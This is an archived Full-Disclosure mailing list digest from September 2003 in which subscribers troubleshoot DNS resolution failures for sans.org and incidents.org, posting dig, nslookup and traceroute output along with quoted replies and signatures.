	%> host www.sans.org ns2.berkeley.edu
	%> host www.sans.org ns1.ems.psu.edu
	%> etc ....
	
	all report not found.
	
	Did they forget to pay the reg fee?
	
	
	--
	
	
	
	Concerned about your privacy? Follow this link to get
	FREE encrypted email: https://www.hushmail.com/?l=2
	
	Free, ultra-private instant messaging with Hush Messenger
	https://www.hushmail.com/services.php?subloc=messenger&l=434
	
	Promote security and make money with the Hushmail Affiliate Program:
	https://www.hushmail.com/about.php?subloc=affiliate&l=427
	
	
	--__--__--
	
	Message: 15
	From: "Marcus Graf" <m.graf@...menwelt.de>
	To: full-disclosure@...ts.netsys.com
	Date: Tue, 02 Sep 2003 23:11:41 +0200
	Subject: Re: [Full-Disclosure] sans.org
	
	> can anyone resolve www.sans.org or www.incidents.org?
	> I tried several name servers and none return an A record.
	
	no problems:
	www.sans.org => 65.173.218.106
	www.incidents.org => 63.100.47.45
	
	but the traceroute from here to www.sans.org dies at
	sl-escal-1-0-0.sprintlink.net [160.81.98.26]
	
	and the traceroute to www.incidents.org ist interesting:
	
	...
	... 500.ATM4-0.GW5.IAD5.ALTER.NET [152.63.43.137]
	... 192.168.11.9 [192.168.11.9]
	
	misconfigured NAT ???
	
	Ciao
	  Marcus
	
	--
	Windows is not the answer.
	Windows is the question and the answer is no.
	
	
	
	--__--__--
	
	Message: 16
	Date: Tue, 2 Sep 2003 23:35:30 +0200
	From: martin f krafft <madduck@...duck.net>
	To: full-disclosure@...ts.netsys.com
	Subject: [Full-Disclosure] Re: sans.org
	
	
	--KN5l+BnMqAQyZLvT
	Content-Type: text/plain; charset=iso-8859-15
	Content-Disposition: inline
	Content-Transfer-Encoding: quoted-printable
	
	also sprach lepkie <lepkie@...hmail.com> [2003.09.02.2129 +0200]:
	> can anyone resolve www.sans.org or www.incidents.org?
	
	no.
	
	> Did they forget to pay the reg fee?
	
	      Created on..............: Fri, Aug 04, 1995
	      Expires on..............: Tue, Aug 03, 2010
	      Record last updated on..: Tue, Sep 02, 2003
	
	They probably screwed up their nameserver. This is said to happen to
	even the pro's ;^>
	
	--=20
	martin;              (greetings from the heart of the sun.)
	  \____ echo mailto: !#^."<*>"|tr "<*> mailto:" net@...duck
	=20
	invalid/expired pgp subkeys? use subkeys.pgp.net as keyserver!
	=20
	obviously the human brain works like a computer.
	since there are no stupid computers humans can't be stupid.
	there are just a few running windoze.
	
	--KN5l+BnMqAQyZLvT
	Content-Type: application/pgp-signature
	Content-Disposition: inline
	
	-----BEGIN PGP SIGNATURE-----
	Version: GnuPG v1.2.2 (GNU/Linux)
	
	iD8DBQE/VQ0iIgvIgzMMSnURAnLvAKClbzWQWQ6lZc0c7lin3BQZsH9ArQCfWMIr
	TqcqUYIGg+N3EvaJKmnlL+s=
	=fWEe
	-----END PGP SIGNATURE-----
	
	--KN5l+BnMqAQyZLvT--
	
	
	--__--__--
	
	Message: 17
	Subject: RE: [Full-Disclosure] sans.org
	Date: Tue, 2 Sep 2003 16:41:24 -0500
	From: "Jerry Heidtke" <jheidtke@...h.edu>
	To: "Marcus Graf" <m.graf@...menwelt.de>, <full-disclosure@...ts.netsys.com>
	
	
	The administrator of dshield has this to say about resolving sans.org:
	
	> I didn't find a NS, which resolves sans.org or isc.sans.org.
	> Anyone else?
	Our registrar (register.com) had problems with sans.org and it did get
	removed from some root servers. Hopefully this will be fixed soon.
	DShield.org may be effected as it uses the same infrastructure. I did
	try to move mail server records to make them work without 'sans.org'.
	--
	--------------------------------------------------------------
	Johannes Ullrich
	
	-----Original Message-----
	From: Marcus Graf [mailto:m.graf@...menwelt.de]
	Sent: Tuesday, September 02, 2003 4:12 PM
	To: full-disclosure@...ts.netsys.com
	Subject: Re: [Full-Disclosure] sans.org
	
	
	> can anyone resolve www.sans.org or www.incidents.org?
	> I tried several name servers and none return an A record.
	
	no problems:
	www.sans.org => 65.173.218.106
	www.incidents.org => 63.100.47.45
	
	but the traceroute from here to www.sans.org dies at
	sl-escal-1-0-0.sprintlink.net [160.81.98.26]
	
	and the traceroute to www.incidents.org ist interesting:
	
	...
	... 500.ATM4-0.GW5.IAD5.ALTER.NET [152.63.43.137]
	... 192.168.11.9 [192.168.11.9]
	
	misconfigured NAT ???
	
	Ciao
	  Marcus
	
	--
	Windows is not the answer.
	Windows is the question and the answer is no.
	
	
	_______________________________________________
	Full-Disclosure - We believe in it.
	Charter: http://lists.netsys.com/full-disclosure-charter.html
	
	Confidentiality Notice: This e-mail message, including any attachments,
	is for the sole use of the intended recipient(s) and may contain
	confidential and privileged information.  Any unauthorized review, use,
	disclosure or distribution is prohibited.  If you are not the intended
	recipient, please contact the sender by reply e-mail and destroy all
	copies of the original message.
	
	
	--__--__--
	
	Message: 18
	Reply-To: "Kurt Seifried" <listuser@...fried.org>
	From: "Kurt Seifried" <listuser@...fried.org>
	To: <lepkie@...tmail.com>, <full-disclosure@...ts.netsys.com>
	Subject: Re: [Full-Disclosure] sans.org - OFFTOPIC
	Date: Tue, 2 Sep 2003 15:41:24 -0600
	
	In a word: yes. They work fine. Your DNS is buggered. Next time I suggest
	checking a website such as Sam Spade before emailing a list with thousands
	of subscribers for something as ridiculously trivial as this.
	
	
	Kurt Seifried, kurt@...fried.org
	A15B BEE5 B391 B9AD B0EF
	AEB0 AD63 0B4E AD56 E574
	http://seifried.org/security/
	
	
	----- Original Message -----
	From: "lepkie" <lepkie@...hmail.com>
	To: <full-disclosure@...ts.netsys.com>
	Sent: Tuesday, September 02, 2003 1:29 PM
	Subject: [Full-Disclosure] sans.org
	
	
	> maybe off topic
	>
	> can anyone resolve www.sans.org or www.incidents.org?
	> I tried several name servers and none return an A record.
	>
	> %> host www.sans.org ns2.berkeley.edu
	> %> host www.sans.org ns1.ems.psu.edu
	> %> etc ....
	>
	> all report not found.
	>
	> Did they forget to pay the reg fee?
	>
	>
	> --
	>
	>
	>
	> Concerned about your privacy? Follow this link to get
	> FREE encrypted email: https://www.hushmail.com/?l=2
	>
	> Free, ultra-private instant messaging with Hush Messenger
	> https://www.hushmail.com/services.php?subloc=messenger&l=434
	>
	> Promote security and make money with the Hushmail Affiliate Program:
	> https://www.hushmail.com/about.php?subloc=affiliate&l=427
	>
	> _______________________________________________
	> Full-Disclosure - We believe in it.
	> Charter: http://lists.netsys.com/full-disclosure-charter.html
	>
	
	
	--__--__--
	
	Message: 19
	Subject: RE: [Full-Disclosure] sans.org
	Date: Tue, 2 Sep 2003 14:45:09 -0700
	From: "Ryan Lowdermilk" <RLowdermilk@...usa.com>
	To: <full-disclosure@...ts.netsys.com>
	
	MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAaCAJIAEggWNQ29u
	dGVudC1UeXBlOiB0ZXh0L3BsYWluOw0KCWNoYXJzZXQ9InVzLWFzY2lpIg0KQ29udGVudC1UcmFu
	c2Zlci1FbmNvZGluZzogN2JpdA0KDQpJIGNvdWxkIG5vdCBlYXJsaWVyIC4uLiBJIGFsc28gY2hl
	Y2tlZCBzZXZlcmFsIE5TJ3MgYW5kIGNvdWxkIG5vdCByZXNvbHZlLiBJDQpzcGF0IG91dCBhIHdo
	b2lzIGFuZCBraW5kYSBpbnRlcmVzdGluZy4uLg0KDQpEb21haW4gSUQ6RDQyMDE4NjgtTFJPUg0K
	RG9tYWluIE5hbWU6U0FOUy5PUkcNCkNyZWF0ZWQgT246MDQtQXVnLTE5OTUgMDQ6MDA6MDAgVVRD
	DQpMYXN0IFVwZGF0ZWQgT246MDEtU2VwLTIwMDMgMTc6MTc6MDUgVVRDDQpFeHBpcmF0aW9uIERh
	dGU6MDMtQXVnLTIwMTAgMDQ6MDA6MDAgVVRDDQoNClNlZW1zIHRoZSBkb21haW4gd2FzIGp1c3Qg
	dXBkYXRlZC4uLiA6LyBobW1tbS4uLg0KDQpIb3dldmVyIGFzIE1hcmN1cyBoYXMgc3RhdGVkIC4u
	LiBJIGNhbiBub3cgY29ubmVjdC4uLiAgDQoNCi0tLS0tT3JpZ2luYWwgTWVzc2FnZS0tLS0tDQpG
	cm9tOiBNYXJjdXMgR3JhZiBbbWFpbHRvOm0uZ3JhZkBmaXJtZW53ZWx0LmRlXSANClNlbnQ6IFR1
	ZXNkYXksIFNlcHRlbWJlciAwMiwgMjAwMyAyOjEyIFBNDQpUbzogZnVsbC1kaXNjbG9zdXJlQGxp
	c3RzLm5ldHN5cy5jb20NClN1YmplY3Q6IFJlOiBbRnVsbC1EaXNjbG9zdXJlXSBzYW5zLm9yZw0K
	DQo+IGNhbiBhbnlvbmUgcmVzb2x2ZSB3d3cuc2Fucy5vcmcgb3Igd3d3LmluY2lkZW50cy5vcmc/
	DQo+IEkgdHJpZWQgc2V2ZXJhbCBuYW1lIHNlcnZlcnMgYW5kIG5vbmUgcmV0dXJuIGFuIEEgcmVj
	b3JkLg0KDQpubyBwcm9ibGVtczogDQp3d3cuc2Fucy5vcmcgPT4gNjUuMTczLjIxOC4xMDYNCnd3
	dy5pbmNpZGVudHMub3JnID0+IDYzLjEwMC40Ny40NQ0KDQpidXQgdGhlIHRyYWNlcm91dGUgZnJv
	bSBoZXJlIHRvIHd3dy5zYW5zLm9yZyBkaWVzIGF0DQpzbC1lc2NhbC0xLTAtMC5zcHJpbnRsaW5r
	Lm5ldCBbMTYwLjgxLjk4LjI2XQ0KDQphbmQgdGhlIHRyYWNlcm91dGUgdG8gd3d3LmluY2lkZW50
	cy5vcmcgaXN0IGludGVyZXN0aW5nOg0KDQouLi4NCi4uLiA1MDAuQVRNNC0wLkdXNS5JQUQ1LkFM
	VEVSLk5FVCBbMTUyLjYzLjQzLjEzN10gLi4uIDE5Mi4xNjguMTEuOQ0KWzE5Mi4xNjguMTEuOV0N
	Cg0KbWlzY29uZmlndXJlZCBOQVQgPz8/DQoNCkNpYW8NCiAgTWFyY3VzDQoNCi0tDQpXaW5kb3dz
	IGlzIG5vdCB0aGUgYW5zd2VyLg0KV2luZG93cyBpcyB0aGUgcXVlc3Rpb24gYW5kIHRoZSBhbnN3
	ZXIgaXMgbm8uDQoNCg0KX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19f
	X19fX18NCkZ1bGwtRGlzY2xvc3VyZSAtIFdlIGJlbGlldmUgaW4gaXQuDQpDaGFydGVyOiBodHRw
	Oi8vbGlzdHMubmV0c3lzLmNvbS9mdWxsLWRpc2Nsb3N1cmUtY2hhcnRlci5odG1sDQoAAAAAAACg
	ggo4MIICPTCCAaYCEQDNun9W8N/kvFT+IqyzcqpVMA0GCSqGSIb3DQEBAgUAMF8xCzAJBgNVBAYT
	AlVTMRcwFQYDVQQKEw5WZXJpU2lnbiwgSW5jLjE3MDUGA1UECxMuQ2xhc3MgMSBQdWJsaWMgUHJp
	bWFyeSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTAeFw05NjAxMjkwMDAwMDBaFw0yODA4MDEyMzU5
	NTlaMF8xCzAJBgNVBAYTAlVTMRcwFQYDVQQKEw5WZXJpU2lnbiwgSW5jLjE3MDUGA1UECxMuQ2xh
	c3MgMSBQdWJsaWMgUHJpbWFyeSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTCBnzANBgkqhkiG9w0B
	AQEFAAOBjQAwgYkCgYEA5Rm/baNWYS2ZSHH2Z965jeu3noaACpEO+jglr0aIguVzqKCbJF0NH8xl
	bgyw0FaEGIeaBpsQoXPftFg5a27B9hXVqKg/qhIGjTGsf7A01480Z4gJzRQR4k5FVmkfeAKA2txH
	kSm7NsljXMXg1y2He6G3MrB7MLoqLzGq7qNn2tsCAwEAATANBgkqhkiG9w0BAQIFAAOBgQBMP7iL
	xmjf7kMzDl3ppssHhE16M/+SG/Q2rdiVIjZoEWx8QszznC7EBz8UsA9P/5CSdvnivErpj82ggAr3
	xSnxgiJduLHdgSOjeyUVRjB5FvjqBUuUfx3CHMjjt/QQQDwTw18fU+hI5Ia0e6E1sHslurjTjqs/
	OJ0ANACY89FxlDCCA2IwggLLoAMCAQICEAvaCxfBP4mOqwl0erTOLjMwDQYJKoZIhvcNAQECBQAw
	XzELMAkGA1UEBhMCVVMxFzAVBgNVBAoTDlZlcmlTaWduLCBJbmMuMTcwNQYDVQQLEy5DbGFzcyAx
	IFB1YmxpYyBQcmltYXJ5IENlcnRpZmljYXRpb24gQXV0aG9yaXR5MB4XDTk4MDUxMjAwMDAwMFoX
	DTA4MDUxMjIzNTk1OVowgcwxFzAVBgNVBAoTDlZlcmlTaWduLCBJbmMuMR8wHQYDVQQLExZWZXJp
	U2lnbiBUcnVzdCBOZXR3b3JrMUYwRAYDVQQLEz13d3cudmVyaXNpZ24uY29tL3JlcG9zaXRvcnkv
	UlBBIEluY29ycC4gQnkgUmVmLixMSUFCLkxURChjKTk4MUgwRgYDVQQDEz9WZXJpU2lnbiBDbGFz
	cyAxIENBIEluZGl2aWR1YWwgU3Vic2NyaWJlci1QZXJzb25hIE5vdCBWYWxpZGF0ZWQwgZ8wDQYJ
	KoZIhvcNAQEBBQADgY0AMIGJAoGBALtaRIoEFrtV/QN6ii2UTxV4NrgNSrJvnFS/vOh3Kp258Gi7
	ldkxQXB6gUu5SBNWLccI4YRCq8CikqtEXKpC8IIOAukv+8I7u77JJwpdtrA2QjO1blSIT4dKvxna
	+RXoD4e2HOPMxpqOf2okkuP84GW6p7F+78nbN2rISsgJBuSZAgMBAAGjgbAwga0wDwYDVR0TBAgw
	BgEB/wIBADBHBgNVHSAEQDA+MDwGC2CGSAGG+EUBBwEBMC0wKwYIKwYBBQUHAgEWH3d3dy52ZXJp
	c2lnbi5jb20vcmVwb3NpdG9yeS9SUEEwMQYDVR0fBCowKDAmoCSgIoYgaHR0cDovL2NybC52ZXJp
	c2lnbi5jb20vcGNhMS5jcmwwCwYDVR0PBAQDAgEGMBEGCWCGSAGG+EIBAQQEAwIBBjANBgkqhkiG
	9w0BAQIFAAOBgQACfZ5vRUs4oLje6VNkIbzkTCuPHv6SQKzYCjlqoTIhLAebq1n+0mIafVU4sDdz
	3PQHZmNiveFTcFKH56jYUulbLarh3s+sMVTUixnI2COo7wQrMn0sGBzIfImoLnfyRNFlCk10te7T
	G5JzdC6JOzUTcudAMZrTssSr51a+i+P7FTCCBI0wggP2oAMCAQICEHlXJMTx7XHrQSACxwZ9sZQw
	DQYJKoZIhvcNAQEEBQAwgcwxFzAVBgNVBAoTDlZlcmlTaWduLCBJbmMuMR8wHQYDVQQLExZWZXJp
	U2lnbiBUcnVzdCBOZXR3b3JrMUYwRAYDVQQLEz13d3cudmVyaXNpZ24uY29tL3JlcG9zaXRvcnkv
	UlBBIEluY29ycC4gQnkgUmVmLixMSUFCLkxURChjKTk4MUgwRgYDVQQDEz9WZXJpU2lnbiBDbGFz
	cyAxIENBIEluZGl2aWR1YWwgU3Vic2NyaWJlci1QZXJzb25hIE5vdCBWYWxpZGF0ZWQwHhcNMDMw
	NzI4MDAwMDAwWhcNMDQwNzI4MjM1OTU5WjCCARsxFzAVBgNVBAoTDlZlcmlTaWduLCBJbmMuMR8w
	HQYDVQQLExZWZXJpU2lnbiBUcnVzdCBOZXR3b3JrMUYwRAYDVQQLEz13d3cudmVyaXNpZ24uY29t
	L3JlcG9zaXRvcnkvUlBBIEluY29ycC4gYnkgUmVmLixMSUFCLkxURChjKTk4MR4wHAYDVQQLExVQ
	ZXJzb25hIE5vdCBWYWxpZGF0ZWQxNDAyBgNVBAsTK0RpZ2l0YWwgSUQgQ2xhc3MgMSAtIE1pY3Jv
	c29mdCBGdWxsIFNlcnZpY2UxGjAYBgNVBAMUEVJ5YW4gUCBMb3dkZXJtaWxrMSUwIwYJKoZIhvcN
	AQkBFhZybG93ZGVybWlsa0BpdGd1c2EuY29tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC6
	2y2/+ZAK/W2B4GQpkDjD2U/0AAgbaT24rqlrzEzrdE2oJLXfJ1zCvry5V26MgU6ByZJ2a7gyYArc
	9pJc9EFr9jrKup7WH6wTIcLaXjEW1qgUPGs+XwLj0c5HNT+vJYDvtu0c8w9+vr/Pp5Bqp0tqb+d4
	x80o6loABHJUbp99twIDAQABo4IBHDCCARgwCQYDVR0TBAIwADCBrAYDVR0gBIGkMIGhMIGeBgtg
	hkgBhvhFAQcBATCBjjAoBggrBgEFBQcCARYcaHR0cHM6Ly93d3cudmVyaXNpZ24uY29tL0NQUzBi
	BggrBgEFBQcCAjBWMBUWDlZlcmlTaWduLCBJbmMuMAMCAQEaPVZlcmlTaWduJ3MgQ1BTIGluY29y
	cC4gYnkgcmVmZXJlbmNlIGxpYWIuIGx0ZC4gKGMpOTcgVmVyaVNpZ24wEQYJYIZIAYb4QgEBBAQD
	AgeAMBQGCmCGSAGG+EUBBgcEBhYETm9uZTAzBgNVHR8ELDAqMCigJqAkhiJodHRwOi8vY3JsLnZl
	cmlzaWduLmNvbS9jbGFzczEuY3JsMA0GCSqGSIb3DQEBBAUAA4GBAB63FMqrX+UOkm559D/XGOz0
	mVmdZGb5ym3YITEyDLGgwUUajIvFMVnLvZu8ILnqiOwf7wiU4yERo2vS39B5AOlumuJ6HgFYYmjN
	/GQpWp09xR8+QMZiKUaWXdu88SW5d3Fz8uJkhrIc2K4QX/zYgWWz69qGf2LajXfYm7ykQWmEMYIE
	PjCCBDoCAQEwgeEwgcwxFzAVBgNVBAoTDlZlcmlTaWduLCBJbmMuMR8wHQYDVQQLExZWZXJpU2ln
	biBUcnVzdCBOZXR3b3JrMUYwRAYDVQQLEz13d3cudmVyaXNpZ24uY29tL3JlcG9zaXRvcnkvUlBB
	IEluY29ycC4gQnkgUmVmLixMSUFCLkxURChjKTk4MUgwRgYDVQQDEz9WZXJpU2lnbiBDbGFzcyAx
	IENBIEluZGl2aWR1YWwgU3Vic2NyaWJlci1QZXJzb25hIE5vdCBWYWxpZGF0ZWQCEHlXJMTx7XHr
	QSACxwZ9sZQwCQYFKw4DAhoFAKCCArIwGAYJKoZIhvcNAQkDMQsGCSqGSIb3DQEHATAcBgkqhkiG
	9w0BCQUxDxcNMDMwOTAyMjE0NDMzWjAjBgkqhkiG9w0BCQQxFgQUKBYD+fLlnq7ewakqFjVviG4C
	GGcwZwYJKoZIhvcNAQkPMVowWDAKBggqhkiG9w0DBzAOBggqhkiG9w0DAgICAIAwDQYIKoZIhvcN
	AwICAUAwBwYFKw4DAgcwDQYIKoZIhvcNAwICASgwBwYFKw4DAhowCgYIKoZIhvcNAgUwgfIGCSsG
	AQQBgjcQBDGB5DCB4TCBzDEXMBUGA1UEChMOVmVyaVNpZ24sIEluYy4xHzAdBgNVBAsTFlZlcmlT
	aWduIFRydXN0IE5ldHdvcmsxRjBEBgNVBAsTPXd3dy52ZXJpc2lnbi5jb20vcmVwb3NpdG9yeS9S
	UEEgSW5jb3JwLiBCeSBSZWYuLExJQUIuTFREKGMpOTgxSDBGBgNVBAMTP1ZlcmlTaWduIENsYXNz
	IDEgQ0EgSW5kaXZpZHVhbCBTdWJzY3JpYmVyLVBlcnNvbmEgTm90IFZhbGlkYXRlZAIQeVckxPHt
	cetBIALHBn2xlDCB9AYLKoZIhvcNAQkQAgsxgeSggeEwgcwxFzAVBgNVBAoTDlZlcmlTaWduLCBJ
	bmMuMR8wHQYDVQQLExZWZXJpU2lnbiBUcnVzdCBOZXR3b3JrMUYwRAYDVQQLEz13d3cudmVyaXNp
	Z24uY29tL3JlcG9zaXRvcnkvUlBBIEluY29ycC4gQnkgUmVmLixMSUFCLkxURChjKTk4MUgwRgYD
	VQQDEz9WZXJpU2lnbiBDbGFzcyAxIENBIEluZGl2aWR1YWwgU3Vic2NyaWJlci1QZXJzb25hIE5v
	dCBWYWxpZGF0ZWQCEHlXJMTx7XHrQSACxwZ9sZQwDQYJKoZIhvcNAQEBBQAEgYAwumbCKYKEmMU4
	Kl8PRzR9xHpiTKW38OV9cQTDKFrIjhB+YExB2aH1PBKknEt7VeshhvtV3G+aidJw4oFBUQaSTn9i
	jkNMilsFApJqdt/jQ+ETCTZjlriXYq87ZLMmY5T13HlUUELrPugh/Tx7MvRjwtaTlXv4qZm+sxQq
	PQfLVwAAAAAAAA==
	
	
	--__--__--
	
	Message: 20
	Date: Tue, 02 Sep 2003 23:45:10 +0200
	To: lepkie@...tmail.com, full-disclosure@...ts.netsys.com
	From: B3r3n <B3r3n@...osnet.com>
	Subject: Re: [Full-Disclosure] sans.org
	
	 From France, sans.org resolves ok but not www.incidents.org
	
	# dig www.incidents.org
	
	; <<>> DiG 8.3 <<>> www.incidents.org
	;; res options: init recurs defnam dnsrch
	;; got answer:
	;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 2
	;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
	;; QUERY SECTION:
	;;      www.incidents.org, type = A, class = IN
	
	;; AUTHORITY SECTION:
	org.                    2h58m24s IN SOA  A7.NSTLD.COM. DOMADMIN.ULTRADNS.NET. (
	                                         2003168420      ; serial
	                                         30M             ; refresh
	                                         15M             ; retry
	                                         1W              ; expiry
	                                         1D )            ; minimum
	
	
	;; Total query time: 2 msec
	;; WHEN: Tue Sep  2 23:44:07 2003
	;; MSG SIZE  sent: 35  rcvd: 104
	
	
	
	--__--__--
	
	Message: 21
	From: "Bernie, CTA" <cta@...in.net>
	Organization: HCSIN
	To: full-disclosure@...ts.netsys.com
	Date: Tue, 02 Sep 2003 17:46:50 -0400
	Subject: Re: [Full-Disclosure] sans.org
	Reply-to: cta@...in.net
	CC: "lepkie" <lepkie@...hmail.com>
	
	nslookup say:
	NS1.HOMEPC.ORG is authoritative for
	sans.org and incidents.org
	
	Server:         NS1.HOMEPC.ORG
	Address:        66.129.1.102#53
	
	Name:   www.sans.org
	Address: 65.173.218.106
	
	and
	Server:         NS1.HOMEPC.ORG
	Address:        66.129.1.102#53
	
	www.incidents.org       canonical name = incidents.org.
	Name:   incidents.org
	Address: 63.100.47.45
	
	I can get to their webs by IP and http://isc.incidents.org/, so
	maybe someone infected the root servers, www CNAMEs?
	
	
	
	On 2 Sep 2003 at 12:29, lepkie wrote:
	
	> maybe off topic
	>
	> can anyone resolve www.sans.org or www.incidents.org?
	> I tried several name servers and none return an A record.
	>
	> %> host www.sans.org ns2.berkeley.edu
	> %> host www.sans.org ns1.ems.psu.edu
	> %> etc ....
	>
	> all report not found.
	>
	> Did they forget to pay the reg fee?
	>
	>
	> --
	>
	>
	>
	> Concerned about your privacy? Follow this link to get
	> FREE encrypted email: https://www.hushmail.com/?l=2
	>
	> Free, ultra-private instant messaging with Hush Messenger
	> https://www.hushmail.com/services.php?subloc=messenger&l=434
	>
	> Promote security and make money with the Hushmail Affiliate
	> Program:
	> https://www.hushmail.com/about.php?subloc=affiliate&l=427
	>
	> _______________________________________________
	> Full-Disclosure - We believe in it.
	> Charter: http://lists.netsys.com/full-disclosure-charter.html
	>
	
	-
	****************************************************
	Bernie
	Chief Technology Architect
	Chief Security Officer
	cta@...in.net
	Euclidean Systems, Inc.
	*******************************************************
	// "There is no expedient to which a man will not go
	//    to avoid the pure labor of honest thinking."  
	//     Honest thought, the real business capital.   
	//      Observe> Think> Plan> Think> Do> Think>     
	*******************************************************
	
	
	
	--__--__--
	
	Message: 22
	From: Joshua Thomas <JThomas@...eronemedia.com>
	To: "'lepkie@...tmail.com'" <lepkie@...tmail.com>,
	   full-disclosure@...ts.netsys.com
	Subject: RE: [Full-Disclosure] sans.org
	Date: Tue, 2 Sep 2003 17:52:18 -0400
	
	This message is in MIME format. Since your mail reader does not understand
	this format, some or all of this message may not be legible.
	
	------_=_NextPart_001_01C3719C.7AA18B30
	Content-Type: text/plain;
	        charset="iso-8859-1"
	
	Not I, either. Nor a number of other people I've asked.
	
	Someone can resolve it to 65.173.218.106, which does appear to be the SANS
	portal site.
	
	Big DNS mistake? Hack? Didn't pay the bill? We'll find out eventually.
	
	Joshua Thomas
	Network Operations Engineer
	PowerOne Media, Inc.
	tel: 518-687-6143
	jthomas@...eronemedia.com
	
	-----Original Message-----
	From: lepkie [mailto:lepkie@...hmail.com]
	Sent: Tuesday, September 02, 2003 3:30 PM
	To: full-disclosure@...ts.netsys.com
	Subject: [Full-Disclosure] sans.org
	
	
	maybe off topic
	
	can anyone resolve www.sans.org or www.incidents.org?
	I tried several name servers and none return an A record.
	
	%> host www.sans.org ns2.berkeley.edu
	%> host www.sans.org ns1.ems.psu.edu
	%> etc ....
	
	all report not found.
	
	Did they forget to pay the reg fee?
	
	
	--
	
	
	
	Concerned about your privacy? Follow this link to get
	FREE encrypted email: https://www.hushmail.com/?l=2
	
	Free, ultra-private instant messaging with Hush Messenger
	https://www.hushmail.com/services.php?subloc=messenger&l=434
	
	Promote security and make money with the Hushmail Affiliate Program:
	https://www.hushmail.com/about.php?subloc=affiliate&l=427
	
	_______________________________________________
	Full-Disclosure - We believe in it.
	Charter: http://lists.netsys.com/full-disclosure-charter.html
	
	------_=_NextPart_001_01C3719C.7AA18B30
	Content-Type: text/html;
	        charset="iso-8859-1"
	Content-Transfer-Encoding: quoted-printable
	
	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
	<HTML>
	<HEAD>
	<META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/html; =
	charset=3Diso-8859-1">
	<META NAME=3D"Generator" CONTENT=3D"MS Exchange Server version =
	5.5.2653.12">
	<TITLE>RE: [Full-Disclosure] sans.org</TITLE>
	</HEAD>
	<BODY>
	
	<P><FONT SIZE=3D2>Not I, either. Nor a number of other people I've =
	asked.</FONT>
	</P>
	
	<P><FONT SIZE=3D2>Someone can resolve it to 65.173.218.106, which does =
	appear to be the SANS portal site.</FONT>
	</P>
	
	<P><FONT SIZE=3D2>Big DNS mistake? Hack? Didn't pay the bill? We'll =
	find out eventually.</FONT>
	</P>
	
	<P><FONT SIZE=3D2>Joshua Thomas</FONT>
	<BR><FONT SIZE=3D2>Network Operations Engineer</FONT>
	<BR><FONT SIZE=3D2>PowerOne Media, Inc.</FONT>
	<BR><FONT SIZE=3D2>tel: 518-687-6143</FONT>
	<BR><FONT SIZE=3D2>jthomas@...eronemedia.com </FONT>
	</P>
	
	<P><FONT SIZE=3D2>-----Original Message-----</FONT>
	<BR><FONT SIZE=3D2>From: lepkie [<A =
	HREF=3D"mailto:lepkie@...hmail.com">mailto:lepkie@...hmail.com</A>]</FON=
	T>
	<BR><FONT SIZE=3D2>Sent: Tuesday, September 02, 2003 3:30 PM</FONT>
	<BR><FONT SIZE=3D2>To: full-disclosure@...ts.netsys.com</FONT>
	<BR><FONT SIZE=3D2>Subject: [Full-Disclosure] sans.org</FONT>
	</P>
	<BR>
	
	<P><FONT SIZE=3D2>maybe off topic</FONT>
	</P>
	
	<P><FONT SIZE=3D2>can anyone resolve www.sans.org or =
	www.incidents.org?</FONT>
	<BR><FONT SIZE=3D2>I tried several name servers and none return an A =
	record.</FONT>
	</P>
	
	<P><FONT SIZE=3D2>%&gt; host www.sans.org ns2.berkeley.edu</FONT>
	<BR><FONT SIZE=3D2>%&gt; host www.sans.org ns1.ems.psu.edu</FONT>
	<BR><FONT SIZE=3D2>%&gt; etc ....</FONT>
	</P>
	
	<P><FONT SIZE=3D2>all report not found.</FONT>
	</P>
	
	<P><FONT SIZE=3D2>Did they forget to pay the reg fee?</FONT>
	</P>
	<BR>
	
	<P><FONT SIZE=3D2>--</FONT>
	</P>
	<BR>
	<BR>
	
	<P><FONT SIZE=3D2>Concerned about your privacy? Follow this link to =
	get</FONT>
	<BR><FONT SIZE=3D2>FREE encrypted email: <A =
	HREF=3D"https://www.hushmail.com/?l=3D2" =
	TARGET=3D"_blank">https://www.hushmail.com/?l=3D2</A></FONT>
	</P>
	
	<P><FONT SIZE=3D2>Free, ultra-private instant messaging with Hush =
	Messenger</FONT>
	<BR><FONT SIZE=3D2><A =
	HREF=3D"https://www.hushmail.com/services.php?subloc=3Dmessenger&l=3D434=
	" =
	TARGET=3D"_blank">https://www.hushmail.com/services.php?subloc=3Dmesseng=
	er&l=3D434</A></FONT>
	</P>
	
	<P><FONT SIZE=3D2>Promote security and make money with the Hushmail =
	Affiliate Program: </FONT>
	<BR><FONT SIZE=3D2><A =
	HREF=3D"https://www.hushmail.com/about.php?subloc=3Daffiliate&l=3D427" =
	TARGET=3D"_blank">https://www.hushmail.com/about.php?subloc=3Daffiliate&=
	l=3D427</A></FONT>
	</P>
	
	<P><FONT =
	SIZE=3D2>_______________________________________________</FONT>
	<BR><FONT SIZE=3D2>Full-Disclosure - We believe in it.</FONT>
	<BR><FONT SIZE=3D2>Charter: <A =
	HREF=3D"http://lists.netsys.com/full-disclosure-charter.html" =
	TARGET=3D"_blank">http://lists.netsys.com/full-disclosure-charter.html</=
	A></FONT>
	</P>
	
	</BODY>
	</HTML>
	------_=_NextPart_001_01C3719C.7AA18B30--
	
	
	--__--__--
	
	Message: 23
	Date: Tue,  2 Sep 2003 15:16:34 -0600
	From: "Ben Nelson" <lists@...om600.org>
	Subject: Re: [Full-Disclosure] sans.org
	To: lepkie@...tmail.com
	Cc: full-disclosure@...ts.netsys.com
	
	I have 3 geographically dispersed data centers and 2 of the 3 can look up
	those names successfully.  The one that can not look them up can not look
	up www.giac.org either.
	
	
	On September 2, 1:29 pm "lepkie" <lepkie@...hmail.com> wrote:
	> maybe off topic
	>
	> can anyone resolve www.sans.org or www.incidents.org?
	> I tried several name servers and none return an A record.
	>
	> %> host www.sans.org ns2.berkeley.edu
	> %> host www.sans.org ns1.ems.psu.edu
	> %> etc ....
	>
	> all report not found.
	>
	> Did they forget to pay the reg fee?
	>
	>
	> --
	>
	>
	>
	> Concerned about your privacy? Follow this link to get
	> FREE encrypted email: https://www.hushmail.com/?l=2
	>
